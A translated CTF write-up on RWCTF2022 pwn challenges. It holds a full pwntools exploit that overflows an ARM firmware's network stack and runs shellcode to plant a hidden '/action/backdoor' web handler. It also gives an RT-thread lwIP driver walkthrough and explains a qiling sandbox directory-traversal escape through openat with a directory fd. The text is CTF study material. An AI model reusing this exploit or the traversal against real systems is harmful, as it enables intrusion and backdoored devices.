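To see why a percent-encoded copy is useless as shellcode, note that every byte outside the unreserved set becomes three ASCII characters, so both the length and the content change. A short standard-library illustration follows; the bytes are arbitrary stand-ins, not the real shellcode:

```python
from urllib.parse import quote_from_bytes, unquote_to_bytes

raw = bytes.fromhex("04e02de500009fe5")   # arbitrary bytes standing in for shellcode
encoded = quote_from_bytes(raw).encode()

print(len(raw), len(encoded))
print(encoded)
```

If the copy found by gdb find looks like the second line, the bytes in memory are the encoded form and will not execute as intended.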
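pwntools fails when assembling the shellcode: pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType(arch = 'arm', bits = 32, encoding = 'latin', endian = 'little', log_level = 10, os = 'linux')
This is because my machine lacked the ARM binutils; installing them fixes it:
sudo apt-get install binutils-arm-linux-gnueabi
In gdb with pwndbg, p/x $fp shows the value of $sp, although $fp and $r11 are the same register. Odd, possibly a gdb bug.
If either of the following happens, reboot Linux (restarting qemu no longer helps) or debug inside docker:
- the shellcode address reported by gdb find is not stable
- several pointer values in the stack data at the overflow site differ on every run
  In my debugging, at most one non-pointer value on the stack changes between runs, and it does not affect execution.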

e. Local exploit

Not tested against the remote, because the remote service was already shut down...

#! python3
from pwn import *
import requests
context(
    arch='arm',
    bits=32,
    encoding='latin',
    log_level="info"
)

baseURL = "http://localhost:5555"

def create_session():
    session = requests.session()
    login_data = {"username": "admin", "password": "admin"}
    res = session.post(url=baseURL+"/action/login", data=login_data)
    assert res.status_code == 200
    return session

def submit_msg(session, msg):
    # submit_data = msg # {"word": msg}
    
    res = session.post(
        url=baseURL+"/action/submit", 
        headers={ "Content-Type":"application/x-www-form-urlencoded" },
        data=msg)
    assert res.status_code == 200

# def get_last_submit_msg(session):
#     res = session.get(url=baseURL+"/submit.jst")
#     assert res.status_code == 200
#     return res.content

def execute_shellcode(shellcode_addr=0x6004cb30):
    def send_packet(packet_len, data=b''):
        p = remote("127.0.0.1", 5555)
        remain_len = packet_len - len(data)
        assert remain_len >= 0
        p.send(data + b"*" * remain_len)
        p.close()
        time.sleep(0.3)

    for ch in "backdoor": # \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72
        send_packet(ord(ch) - 0x3a)
    send_packet(0x202 - 0x3a, flat(
        "-"*0xa,
        0x6b636162,      0x726f6f64,      0x60e4297c,      0x00000202,
        0x02020000,      0x609a4208,      0x61cd29f8,      0xffffffff,
        0x61cd27e4,      0x60e52d58,      0x04040404,      0x60e429d4,
        shellcode_addr,  0x06060606,      0x00000000,      0x08080808,
        0x609a4208,      0x61cd278c,      0x6000001f,      0x00000001,
        0x2000001f,      0x11111111,      0x00000000,      0x00000000,
        0x00000000,      0x00000000,      0x00000000,      0x00000000,
        0x80000068,      0x60e428e8,      0x00000000,      0x60e52cf4,
        0x609a40e4,      0x60e429f0,      0x609a40dc,      0x00000001,
        0x60e3a994,      0x60e3a994,      0x60e429f0,      0x00000000,
        0x00000006,      0x60e3a9e8,      0x00787265,      0x00000000,
        0x00000000,      0x00000005,      0x00000000,      0x00000006,
        0x00000000,      0x0000007e,      0x00000000,      0x00000000,
        0x00000000,      0x00000000,      0x80000080,      0x60e42aac,
        0x60e42ac0,      0x60e42acc,      0x60e42abc,      0x00000000,
        0x60e42a70,      0xffffffff,      0x60e42a70,      0x60e42a70,
        0x00000001,      0x60e42a84,      0xffffffff,      0x60e4aaf8,
        0x60e4aaf8,      0x00000000,      0x00000008,      0x00000004,
        0x0000ffff,      0x00000000,      0x00000000,      0x00000000,
        0x60e52bc4,      0x60e52a9c,      0x60e52ab4,      0x60e72954,
        0x60e52a9c,      0x60e52a9c,      0x60e52ab4,      0x60e72954,
        0x00000000,      0x00000000,      0x80008008,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      "\xa5\xa5",
    ))

shellcode_addr = 0x60d9c588
sc_bytecode = asm(vma=shellcode_addr, shellcode='''
    // save all registers
    push {r0-r11}

    // memcpy handler to /log_err.html + 0x200
    ldr r0, =0x606D3aD0 
    ldr r1, =backdoor_handler 
    ldr r2, =0x200         
    ldr r3, =0x60021704 
    BL call

    // call websDefineAction("backdoor", backdoor_handler)
    ldr r0, =backdoor     
    ldr r1, =0x606D3aD0   
    ldr r3, =0x6004D28C   
    BL call

    // rt_printf status
    mov r1, r0
    ldr r0, =rt_printf_fmt
    ldr r3, =0x6002111C
    BL call

    // websAddRoute("/action/backdoor", "action", 0)
    ldr r0, =route_path
    ldr r1, =route_handler
    mov r2, 0
    ldr r3, =0x600636A0
    BL call

    // pop all registers
    pop {r0-r11}

    // return to origin
    ldr pc, =0x6004cb30

/* ----------- backdoor_handler ----------- */
backdoor_handler:
    push {r1-r11, lr}
    push {r0}

    // char* name = websGetVar(wp, key, key);
    ldr r0, [sp]
    ldr r1, =flag
    ldr r2, =flag
    ldr r3, =0x600577C4
    BL call

    // memcpy to 404 data
    mov r1, r0
    ldr r0, =0x60076824
    // ldr r1, =success_page  
    ldr r2, =23          
    ldr r3, =0x60021704
    BL call

    // websSetStatus(wp, 200)
    ldr r0, [sp]
    ldr r1, =200
    ldr r3, =0x600588C4
    BL call

    // websWriteHeaders(wp, -1, 0)
    ldr r0, [sp]
    ldr r1, =-1
    ldr r2, =0
    ldr r3, =0x6005891C
    BL call

    // websWriteEndHeaders(wp)
    ldr r0, [sp]
    ldr r3, =0x60058D30
    BL call

    // websWrite(wp, page)
    ldr r0, [sp]
    ldr r1, =success_page
    ldr r3, =0x60058E2C
    BL call

    // websDone(wp)
    ldr r0, [sp]
    ldr r3, =0x6005496C
    BL call

    pop {r0}
    pop {r1-r11, pc}

call: // manual implementation of call r3
    push {lr}
    mov lr, pc
    add lr, lr, 4
    mov pc, r3 
    pop {pc}

flag:           .asciz  "flag"
backdoor:       .asciz  "backdoor"
success_page:   .asciz  "{\\"status\\" : \\"success\\"}"

route_path:     .asciz  "/action/backdoor"
route_handler:  .asciz  "action"

rt_printf_fmt:  .asciz  "shellcode status: %d\\n"
backdoor_fmt:   .asciz  "backdoor: %s\\n"
''')

if __name__ == '__main__': 
    # start qemu
    p = process("./dbg.sh")
    p.recvuntil("lwIP-2.1.3 initialized!")
    time.sleep(1)

    # send and run the shellcode
    log.info("exploiting...")
    session = create_session()
    submit_msg(session, b"ShellcodeHeader" + sc_bytecode)
    execute_shellcode(shellcode_addr)

    # run the health check manually and fetch the flag
    # print(p.recvall(timeout=1))
    # os.system("python3 ./flag.py")
    p.interactive()
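Reading the flat() call in execute_shellcode against the decompiled stack frame gives the following offset bookkeeping. It assumes (this is my inference, not stated during debugging) that 54 bytes of Ethernet/IPv4/TCP headers sit at the start of the copied buffer, which is what makes the 0xa bytes of padding end exactly where v4 ends:

```python
HEADERS = 14 + 20 + 20      # assumed bytes preceding the TCP payload in the frame
PAD = 0xA                   # the "-" * 0xa filler in the exploit
V4_SIZE = 64                # char v4[64] at bp-0x70
WORD = 4

v5_off = HEADERS + PAD                 # where 0x6b636162 ("back") lands
pktlen_off = v5_off + 3 * WORD         # fourth word of the list, 0x00000202
ret_index = 12                         # position of shellcode_addr in the word list
ret_off = v5_off + ret_index * WORD    # offset from v4 to the overwritten slot

print(hex(v5_off), hex(-0x70 + pktlen_off), hex(ret_off))
```

The second printed value can be compared with the bp-relative slot of pktlen in the decompiled listing as a consistency check on the assumed header size.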

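Result:

VII. RT-thread – lwIP

That concludes the solution. Next comes a brief extension of the topic.

a. Overview

The lwIP stack used inside FreeRTOS in this challenge is the one from RT-thread (a Chinese RTOS).

According to the challenge author, RT-thread's lwIP was used to make debugging easier.
Writing challenges is not easy either...

lwIP is a small open-source TCP/IP stack that focuses on reducing RAM usage while keeping the main TCP features, which suits embedded systems. In RT-thread, the driver architecture of the stack looks like this:

On top of stock lwIP, RT-thread adds a network device layer, which handles Ethernet receive and transmit with two independent threads.

When the Ethernet hardware receives a frame, it places the data in a buffer and raises a hardware interrupt. The registered interrupt handler sends a mail to notify the receive thread erx, which allocates a pbuf according to the frame length, reads the data in, and once reception is complete sends another mail to wake the TCP/IP thread for further processing.

When there is data to send, lwIP posts a request to the etx thread by mail and then waits indefinitely on the tx_ack semaphore until transmission completes. When the etx thread has finished sending, it sets tx_ack to tell lwIP that the data has been sent.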
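The mailbox-plus-acknowledgement pattern on the transmit side can be mimicked with Python's standard threading primitives. This is only an analogy for the flow described above, with a queue standing in for the mailbox and an Event standing in for tx_ack; none of the names come from RT-thread:

```python
import queue
import threading

tx_mailbox = queue.Queue()          # stands in for the etx mailbox
sent = []                           # frames "put on the wire"

def etx_thread():
    while True:
        msg = tx_mailbox.get()      # block until a mail arrives
        if msg is None:             # sentinel used only to stop this demo
            break
        buf, ack = msg
        sent.append(buf)            # the driver's eth_tx would run here
        ack.set()                   # signal completion back to the sender

def lwip_send(buf: bytes) -> None:
    ack = threading.Event()         # stands in for tx_ack
    tx_mailbox.put((buf, ack))
    ack.wait()                      # wait until etx reports the frame sent

worker = threading.Thread(target=etx_thread)
worker.start()
lwip_send(b"frame-1")
lwip_send(b"frame-2")
tx_mailbox.put(None)
worker.join()
print(sent)
```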

Next, a brief look at this send/receive path.

b. lwip_init

At startup, control flow in the RTOS runs lwip_system_init to perform a series of initialization steps.

/**
 * LwIP system initialization
 */
extern int eth_system_device_init_private(void);
int lwip_system_init(void)
{
    ...
    eth_system_device_init_private();
    ...
    tcpip_init(tcpip_init_done_callback, (void *)&done_sem);
    ...
    rt_kprintf("lwIP-%d.%d.%d initialized!\n", LWIP_VERSION_MAJOR, LWIP_VERSION_MINOR, LWIP_VERSION_REVISION);
    ...
}

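This function:

Calls eth_system_device_init_private to initialize the erx and etx threads.
Calls tcpip_init to create the tcpip thread.
Prints a banner. The message printed here is the same one the challenge prints.

We only care about eth_system_device_init_private, which does just two things: it creates the etx and erx threads and their mailboxes.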

int eth_system_device_init_private(void)
{
    rt_err_t result = RT_EOK;

    /* initialize Rx thread. */
#ifndef LWIP_NO_RX_THREAD
    /* initialize mailbox and create Ethernet Rx thread */
    result = rt_mb_init(&eth_rx_thread_mb, "erxmb",
                        &eth_rx_thread_mb_pool[0], sizeof(eth_rx_thread_mb_pool)/4,
                        RT_IPC_FLAG_FIFO);
    RT_ASSERT(result == RT_EOK);

    result = rt_thread_init(&eth_rx_thread, "erx", eth_rx_thread_entry, RT_NULL,
                            &eth_rx_thread_stack[0], sizeof(eth_rx_thread_stack),
                            RT_ETHERNETIF_THREAD_PREORITY, 16);
    RT_ASSERT(result == RT_EOK);
    result = rt_thread_startup(&eth_rx_thread);
    RT_ASSERT(result == RT_EOK);
#endif

    /* initialize Tx thread */
#ifndef LWIP_NO_TX_THREAD
    /* initialize mailbox and create Ethernet Tx thread */
    result = rt_mb_init(&eth_tx_thread_mb, "etxmb",
                        &eth_tx_thread_mb_pool[0], sizeof(eth_tx_thread_mb_pool)/4,
                        RT_IPC_FLAG_FIFO);
    RT_ASSERT(result == RT_EOK);

    result = rt_thread_init(&eth_tx_thread, "etx", eth_tx_thread_entry, RT_NULL,
                            &eth_tx_thread_stack[0], sizeof(eth_tx_thread_stack),
                            RT_ETHERNETIF_THREAD_PREORITY, 16);
    RT_ASSERT(result == RT_EOK);

    result = rt_thread_startup(&eth_tx_thread);
    RT_ASSERT(result == RT_EOK);
#endif

    return (int)result;
}

Let's see what the erx thread mainly does:

/* Ethernet Rx Thread */
static void eth_rx_thread_entry(void* parameter)
{
    struct eth_device* device;

    while (1)
    {
        // Try to read a mail from the mailbox; block forever if there is none
        if (rt_mb_recv(&eth_rx_thread_mb, (rt_ubase_t *)&device, RT_WAITING_FOREVER) == RT_EOK)
        {
            rt_base_t level;
            struct pbuf *p;
            ...
            /* receive all of buffer */
            while (1)
            {
                if(device->eth_rx == RT_NULL) break;

                // Call the registered eth_rx function to receive data from the device
                p = device->eth_rx(&(device->parent));
                if (p != RT_NULL)
                {
                    /* notify to upper layer */
                    // Hand the received data to the TCPIP thread here
                    if( device->netif->input(p, device->netif) != ERR_OK )
                    {
                        LWIP_DEBUGF(NETIF_DEBUG, ("ethernetif_input: Input error\n"));
                        pbuf_free(p);
                        p = NULL;
                    }
                }
                else break;
            }
        }
        else
        {
            LWIP_ASSERT("Should not happen!\n",0);
        }
    }
}

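The code shows that this thread loops through: read the mailbox -> read data from the device -> pass the data to the TCPIP thread.

The other thread, etx, mainly deals with the hardware: it forwards data sent by the TCPIP thread to the concrete device for transmission and, once the packet is sent, sends an ack back to the TCPIP thread: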

/* Ethernet Tx Thread */
static void eth_tx_thread_entry(void* parameter)
{
    struct eth_tx_msg* msg;

    while (1)
    {
        // Blocking read of a mail
        if (rt_mb_recv(&eth_tx_thread_mb, (rt_ubase_t *)&msg, RT_WAITING_FOREVER) == RT_EOK)
        {
            struct eth_device* enetif;

            RT_ASSERT(msg->netif != RT_NULL);
            RT_ASSERT(msg->buf   != RT_NULL);

            enetif = (struct eth_device*)msg->netif->state;
            if (enetif != RT_NULL)
            {
                /* call driver's interface */
                // try to transmit the packet
                if (enetif->eth_tx(&(enetif->parent), msg->buf) != RT_EOK)
                {
                    /* transmit eth packet failed */
                }
            }

            /* send ACK */ // After transmission, send the ACK back to the TCPIP thread
            rt_completion_done(&msg->ack);
        }
    }
}

c. hw_init

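The above covers how lwIP initializes the etx and erx threads. The actual sending and receiving is done by concrete hardware, so how does that hardware get registered?

Here we take the qemu-vexpress-a9 device as an example (yes, the very device used by the FLAG challenge).

Following this call chain: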

/**
 * @brief  This function will call all levels of initialization functions to complete
 *         the initialization of the system, and finally start the scheduler.
 */
int rtthread_startup(void);
    
=> calls =>
    
/**
 * @brief  This function will create and start the main thread, but this thread
 *         will not run until the scheduler starts.
 */
void rt_application_init(void);

=> creates the main thread, whose entry function is =>
 
/**
 * @brief  The system main thread. In this thread will call the rt_components_init()
 *         for initialization of RT-Thread Components and call the user's programming
 *         entry main().
 */
void main_thread_entry(void *parameter);

=> calls =>
    
/**
 * @brief  RT-Thread Components Initialization.
 */
void rt_components_init(void);

We can then look at the implementation of rt_components_init:

/**
 * @brief  RT-Thread Components Initialization.
 */
void rt_components_init(void)
{
#if RT_DEBUG_INIT
    [...]
#else
    volatile const init_fn_t *fn_ptr;

    for (fn_ptr = &__rt_init_rti_board_end; fn_ptr < &__rt_init_rti_end; fn_ptr ++)
    {
        (*fn_ptr)();
    }
#endif /* RT_DEBUG_INIT */
}

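Doesn't this look a lot like the spot we reached earlier when following cross-references upward from the backdoor in IDA's decompilation?

The function walks every function pointer from __rt_init_rti_board_end up to (but not including) __rt_init_rti_end and calls each one. What do these two symbols stand for? Let's read the related code and comments: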

/*
 * Components Initialization will initialize some driver and components as following
 * order:
 * rti_start         --> 0
 * BOARD_EXPORT      --> 1
 * rti_board_end     --> 1.end
 *
 * DEVICE_EXPORT     --> 2
 * COMPONENT_EXPORT  --> 3
 * FS_EXPORT         --> 4
 * ENV_EXPORT        --> 5
 * APP_EXPORT        --> 6
 *
 * rti_end           --> 6.end
 *
 * These automatically initialization, the driver or component initial function must
 * be defined with:
 * INIT_BOARD_EXPORT(fn);
 * INIT_DEVICE_EXPORT(fn);
 * ...
 * INIT_APP_EXPORT(fn);
 * etc.
 */
static int rti_start(void) { return 0; }
INIT_EXPORT(rti_start, "0");

static int rti_board_start(void) { return 0; }
INIT_EXPORT(rti_board_start, "0.end");

static int rti_board_end(void) { return 0; }
INIT_EXPORT(rti_board_end, "1.end");

static int rti_end(void) { return 0; }
INIT_EXPORT(rti_end, "6.end");

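There is also this macro definition:

#define INIT_EXPORT(fn, level) \
    RT_USED const init_fn_t __rt_init_##fn RT_SECTION(".rti_fn." level) = fn

The conclusion: the compiled binary contains data sections whose names start with .rti_fn. They hold function pointers used to initialize devices and other components. The two symbols mentioned above are themselves function pointers registered in these sections, and they act as markers that delimit where the function pointers of a particular level live.

We can also see that the function pointer of anything declared with the INIT_APP_EXPORT macro lands in the range __rt_init_rti_board_end -> __rt_init_rti_end.

In other words, an initialization function declared with INIT_APP_EXPORT is executed inside rt_components_init.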
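The ordering described above can be sketched in a few lines of Python. This is only a model, not RT-Thread code: it assumes the linker script sorts the .rti_fn.* input sections by name, and the entry board_init is a hypothetical placeholder for some INIT_BOARD_EXPORT function.

```python
# Model of the .rti_fn.* table: (section name, function name).
# "board_init" is a hypothetical board-level init function used for illustration.
init_table = [
    (".rti_fn.6.end", "rti_end"),
    (".rti_fn.6", "smc911x_emac_hw_init"),   # INIT_APP_EXPORT -> level "6"
    (".rti_fn.1.end", "rti_board_end"),
    (".rti_fn.1", "board_init"),             # INIT_BOARD_EXPORT -> level "1"
    (".rti_fn.0.end", "rti_board_start"),
    (".rti_fn.0", "rti_start"),
]


def components_init_order(table):
    """Return the functions rt_components_init would call, in order."""
    # Assumption: the linker lays the pointers out sorted by section name.
    names = [fn for _, fn in sorted(table, key=lambda entry: entry[0])]
    start = names.index("rti_board_end")   # loop starts AT this marker
    end = names.index("rti_end")           # and stops BEFORE this one
    return names[start:end]


order = components_init_order(init_table)
print(order)
```

Under these assumptions the board-level entry is skipped (it sits before rti_board_end), while the APP-level smc911x_emac_hw_init falls inside the window that rt_components_init iterates over.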

d. smc911_init

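Next, let's look at the smc911x device driver, which is the driver that contains the backdoor (bsp\qemu-vexpress-a9\drivers\drv_smc911x.c).

The file contains the following statement:

INIT_APP_EXPORT(smc911x_emac_hw_init);

That is, the smc911x device registers its initialization function smc911x_emac_hw_init in the .rti_fn section, where it waits to be called by rt_components_init.
The source of smc911x_emac_hw_init is as follows: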

int smc911x_emac_hw_init(void)
{
    _emac.iobase = VEXPRESS_ETH_BASE;
    // Set the interrupt number
    _emac.irqno  = IRQ_VEXPRESS_A9_ETH;
    ...
    /* set INT CFG */
    smc911x_reg_write(&_emac, LAN9118_IRQ_CFG, LAN9118_IRQ_CFG_IRQ_POL | LAN9118_IRQ_CFG_IRQ_TYPE);
    ...
#ifdef RT_USING_DEVICE_OPS
    _emac.parent.parent.ops        = &smc911x_emac_ops;
#else
    _emac.parent.parent.init       = smc911x_emac_init;
    _emac.parent.parent.open       = RT_NULL;
    _emac.parent.parent.close      = RT_NULL;
    _emac.parent.parent.read       = RT_NULL;
    _emac.parent.parent.write      = RT_NULL;
    _emac.parent.parent.control    = smc911x_emac_control;
#endif
    _emac.parent.parent.user_data  = RT_NULL;
    // Note: the eth_rx and eth_tx methods are set here
    _emac.parent.eth_rx     = smc911x_emac_rx;
    _emac.parent.eth_tx     = smc911x_emac_tx;

    /* register ETH device */
    // Initialize the eth device
    eth_device_init(&(_emac.parent), "e0");
    ...
}

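This function mainly sets up a number of operations (ops), such as smc911x_emac_init, smc911x_emac_rx and smc911x_emac_tx. It fills in the eth_rx and eth_tx fields of the _emac structure, so whenever the lwIP threads need to receive or send data they call this device's smc911x_emac_rx and smc911x_emac_tx.

What is interesting here is the inheritance-like relationship of the _emac structure: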

struct eth_device_smc911x
{
    /* inherit from Ethernet device */
    struct eth_device parent;
    /* interface address info. */
    rt_uint8_t enetaddr[MAX_ADDR_LEN];         /* MAC address  */

    uint32_t iobase;
    uint32_t irqno;
};

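The struct embeds a parent member, much like inheritance in C++, so the enclosing struct represents one concrete Ethernet device. The source of the eth_device structure is as follows: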

struct eth_device
{
    /* inherit from rt_device */
    struct rt_device parent;

    /* network interface for lwip */
    struct netif *netif;
    struct rt_semaphore tx_ack;

    rt_uint16_t flags;
    rt_uint8_t  link_changed;
    rt_uint8_t  link_status;
    rt_uint8_t  rx_notice;

    /* eth device interface */
    struct pbuf* (*eth_rx)(rt_device_t dev);
    rt_err_t (*eth_tx)(rt_device_t dev, struct pbuf* p);
};

#ifdef __cplusplus
extern "C" {
#endif

    rt_err_t eth_device_ready(struct eth_device* dev);
    rt_err_t eth_device_init(struct eth_device * dev, const char *name);
    rt_err_t eth_device_init_with_flag(struct eth_device *dev, const char *name, rt_uint16_t flag);
    rt_err_t eth_device_linkchange(struct eth_device* dev, rt_bool_t up);

    int eth_system_device_init(void);

#ifdef __cplusplus
}
#endif

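This structure describes an abstract Ethernet device interface; its function pointers are called from the lwIP layer.

Note that smc911x_emac_hw_init finishes by calling eth_device_init, which eventually reaches smc911x_emac_init, where the interrupt service routine smc911x_isr is installed:

rt_hw_interrupt_install(emac->irqno, smc911x_isr, emac, "smc911x");

When the Ethernet device raises an interrupt because data has arrived, smc911x_isr is invoked; if the data is ready, it calls eth_device_ready: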

static void smc911x_isr(int vector, void *param)
{
    uint32_t status;
    struct eth_device_smc911x *emac;

    emac = SMC911X_EMAC_DEVICE(param);

    status = smc911x_reg_read(emac, LAN9118_INT_STS);

    if (status & LAN9118_INT_STS_RSFL)
    {
        eth_device_ready(&emac->parent);
    }
    smc911x_reg_write(emac, LAN9118_INT_STS, status);

    return ;
}

eth_device_ready in turn sends a mail to the erx thread:

rt_err_t eth_device_ready(struct eth_device* dev)
{
    if (dev->netif)
    {
        if(dev->rx_notice == RT_FALSE)
        {
            dev->rx_notice = RT_TRUE;
            // Send a mail to the erx thread
            return rt_mb_send(&eth_rx_thread_mb, (rt_ubase_t)dev);
        }
        else
            return RT_EOK;
        /* post message to Ethernet thread */
    }
    else
        return -RT_ERROR; /* netif is not initialized yet, just return. */
}

With that, the whole flow is complete, and it matches the flow chart at the very top.
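To make the receive path concrete, here is a small single-threaded Python model of it. It is a sketch under stated assumptions, not the RT-Thread implementation: FakeEthDevice and netif_input are hypothetical stand-ins, a queue.Queue plays the role of the mailbox, and resetting rx_notice in the rx step is an assumption about the part of the thread body that the listing above elides.

```python
import queue


class FakeEthDevice:
    """Hypothetical stand-in for struct eth_device plus its driver."""

    def __init__(self, frames):
        self.frames = list(frames)   # frames waiting in the "hardware" FIFO
        self.rx_notice = False
        self.delivered = []          # what the TCPIP side ends up seeing

    def eth_rx(self):
        # Mirrors device->eth_rx(): one frame, or None when the FIFO is empty.
        return self.frames.pop(0) if self.frames else None

    def netif_input(self, frame):
        # Mirrors device->netif->input(): hand the frame to the TCPIP thread.
        self.delivered.append(frame)


eth_rx_mailbox = queue.Queue()   # plays the role of eth_rx_thread_mb


def eth_device_ready(dev):
    """Called from the ISR: post the device once until the rx thread runs."""
    if not dev.rx_notice:
        dev.rx_notice = True
        eth_rx_mailbox.put(dev)


def eth_rx_thread_step():
    """One iteration of the erx loop: wait for a mail, then drain the device."""
    dev = eth_rx_mailbox.get()
    dev.rx_notice = False        # assumption: done in the elided part of the thread
    while True:
        frame = dev.eth_rx()
        if frame is None:
            break
        dev.netif_input(frame)


dev = FakeEthDevice([b"frame-1", b"frame-2"])
eth_device_ready(dev)   # first interrupt posts a mail
eth_device_ready(dev)   # second interrupt is coalesced by rx_notice
eth_rx_thread_step()
```

The point of the rx_notice flag is visible here: two interrupts produce a single mail, and the rx step drains every pending frame in one go.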

VIII. References

IX. Acknowledgements

Special thanks to 呆呆师傅 for the technical write-up of the FLAG challenge.

RWCTF2022 Pwn Notes 1

2022-01-24T16:00:00.000Z

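I. Introduction

These are notes written while reviewing the following three RWCTF2022 challenges:

QLaaS
Who Moved My Block
SVME

Because of limited time, the exp for some of the challenges is not included; only the detailed solving or exploitation process is recorded.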

II. QLaaS

1. QLaaS challenge description

Qiling as a Service.
nc 47.242.149.197 7600
QLaaS_61a8e641694e10ce360554241bdda977.tar.gz
Note: read flag using /readflag

Clone-and-Pwn, difficulty:Schrödinger

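The challenge only provides the following script, which reads a file sent by the user and runs it inside the qiling sandbox (with a temporary directory as the rootfs):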

#!/usr/bin/env python3

import os
import sys
import base64
import tempfile
# pip install qiling==1.4.1
from qiling import Qiling

def my_sandbox(path, rootfs):
    ql = Qiling([path], rootfs)
    ql.run()

def main():
    sys.stdout.write('Your Binary(base64):\n')
    line = sys.stdin.readline()
    binary = base64.b64decode(line.strip())
    
    with tempfile.TemporaryDirectory() as tmp_dir:
        fp = os.path.join(tmp_dir, 'bin')

        with open(fp, 'wb') as f:
            f.write(binary)

        my_sandbox(fp, tmp_dir)

if __name__ == '__main__':
    main()

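Goal: execute /readflag to obtain the flag (note that reading /flag directly is not the intended path).

2. Setting up the qiling framework

# Clone the qiling framework
git clone git@github.com:qilingframework/qiling.git
cd qiling
# Put the challenge attachment into the qiling source tree
nano main.py
# Create our own exp
touch exp.cpp

# Install PyCharm (don't debug with VSCode)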

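3. Vulnerability

The unicorn framework is the core of qiling, and qiling builds many extra features on top of it, including interaction with the OS. qiling implements its own set of syscalls, and the sandboxed program interacts with the OS indirectly through these qiling syscalls.

If one of these qiling syscalls is flawed, the sandboxed program can use it to escape the sandbox.

By default, qiling logs every syscall the sandboxed program makes while it runs.

With string search, dynamic debugging and some background reading, we find that the POSIX syscall implementations live under qiling/qiling/os/posix/syscall/. What follows is code auditing plus debugging.

Through ~~being carried by the experts~~ auditing and debugging, we find a directory traversal vulnerability in ql_syscall_openat. To explain it, let's first write a small program that uses open and watch how qiling handles it: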

#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <iostream>

using namespace std;

int main() {
    int fd = open("../../../../../../../../proc/self/", O_RDONLY, 0);

    return 0;
}

As the syscall log shows, the syscall actually issued is SYS_openat rather than SYS_open.

When ql_syscall_openat is called, the file is actually opened in ql.os.fs_mapper.open_ql_file:

def ql_syscall_openat(ql: Qiling, fd: int, path: int, flags: int, mode: int):
    file_path = ql.os.utils.read_cstring(path)
    # real_path = ql.os.path.transform_to_real_path(path)
    # relative_path = ql.os.path.transform_to_relative_path(path)

    flags &= 0xffffffff
    mode &= 0xffffffff

    idx = next((i for i in range(NR_OPEN) if ql.os.fd[i] == 0), -1)

    if idx == -1:
        regreturn = -EMFILE
    else:
        try:
            if ql.archtype== QL_ARCH.ARM:
                mode = 0

            flags = ql_open_flag_mapping(ql, flags)
            fd = ql.unpacks(ql.pack(fd))

            if 0 <= fd < NR_OPEN:
                dir_fd = ql.os.fd[fd].fileno()
            else:
                dir_fd = None

            # Note: the real file is opened here, and the resulting descriptor is stored in the fd array
            ql.os.fd[idx] = ql.os.fs_mapper.open_ql_file(file_path, flags, mode, dir_fd)

            regreturn = idx
        except QlSyscallError as e:
            regreturn = -e.errno
            
    ql.log.debug(f'openat(fd = {fd:d}, path = {file_path}, mode = {mode:#o}) = {regreturn:d}')

    return regreturn

Let's continue with the source of ql.os.fs_mapper.open_ql_file. Since we are opening an ordinary file, execution takes the else branch below:

def open_ql_file(self, path, openflags, openmode, dir_fd=None):
    if self.has_mapping(path):
        self.ql.log.info(f"mapping {path}")
        return self._open_mapping_ql_file(path, openflags, openmode)
    else:
        # This branch is taken
        if dir_fd:
            return ql_file.open(path, openflags, openmode, dir_fd=dir_fd)

        real_path = self.ql.os.path.transform_to_real_path(path)
        return ql_file.open(real_path, openflags, openmode)

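If there is no dir_fd, transform_to_real_path is called to convert the incoming path into the real path, i.e. an absolute path on the host. The call chain through which transform_to_real_path processes the path is: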

convert_for_native_os, path.py:106
convert_path, path.py:114
transform_to_real_path, path.py:131
open_ql_file, mapper.py:106
ql_syscall_openat, fcntl.py:108
[....]

In the end, qiling filters out the directory traversal components in convert_for_native_os.

@staticmethod
def convert_for_native_os(rootfs: Union[str, Path], cwd: str, path: str) -> Path:
    _rootfs = Path(rootfs)          # _rootfs : /tmp/tmpldhylv0h
    _cwd = PurePosixPath(cwd[1:])   # _cwd : .
    _path = Path(path)              # _path : ../../../../../../../../proc/self

    if _path.is_absolute():
        return _rootfs / QlPathManager.normalize(_path)
    else:
        # This branch is taken; it returns /tmp/tmpldhylv0h/proc/self
        return _rootfs / QlPathManager.normalize(_cwd / _path.as_posix())

Afterwards, open_ql_file above calls ql_file.open to interact with the OS, and that function does no path filtering at all:

@classmethod
def open(cls, open_path: AnyStr, open_flags: int, open_mode: int, dir_fd: int = None):
    open_mode &= 0x7fffffff

    try:
        # The incoming path goes straight to the OS without any filtering
        fd = os.open(open_path, open_flags, open_mode, dir_fd=dir_fd)
    except OSError as e:
        raise QlSyscallError(e.errno, e.args[1] + ' : ' + e.filename)

    return cls(open_path, fd)

So does this mean the qiling openat syscall cannot be used for path traversal? Not quite. Look at this part of open_ql_file:

def open_ql_file(self, path, openflags, openmode, dir_fd=None):
    if self.has_mapping(path):
        self.ql.log.info(f"mapping {path}")
        return self._open_mapping_ql_file(path, openflags, openmode)
    else:
        # If a dir fd is present
        if dir_fd:
            # then path goes straight to the OS without any filtering
            return ql_file.open(path, openflags, openmode, dir_fd=dir_fd)

        real_path = self.ql.os.path.transform_to_real_path(path)
        return ql_file.open(real_path, openflags, openmode)

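Therefore, if we call the qiling openat syscall with a valid directory fd and a malicious traversal path, the path reaches the host OS unfiltered and we get a directory traversal attack!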
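The host-side effect can be reproduced without qiling at all. The following is a minimal sketch, assuming a Linux host where os.open supports dir_fd; open_like_ql_file is a hypothetical helper that only mimics the unfiltered os.open call shown above, and the directory layout is made up for the demo.

```python
import os
import tempfile


def open_like_ql_file(path, dir_fd=None):
    """Hypothetical helper: forwards path to os.open unfiltered, like the dir_fd branch."""
    return os.open(path, os.O_RDONLY, dir_fd=dir_fd)


with tempfile.TemporaryDirectory() as base:
    rootfs = os.path.join(base, "rootfs")      # plays the role of the sandbox rootfs
    os.mkdir(rootfs)
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("outside")                     # a file OUTSIDE the rootfs

    root_fd = os.open(rootfs, os.O_RDONLY)     # what the guest gets from open("/")
    try:
        # A relative path with ".." is resolved by the kernel starting at root_fd,
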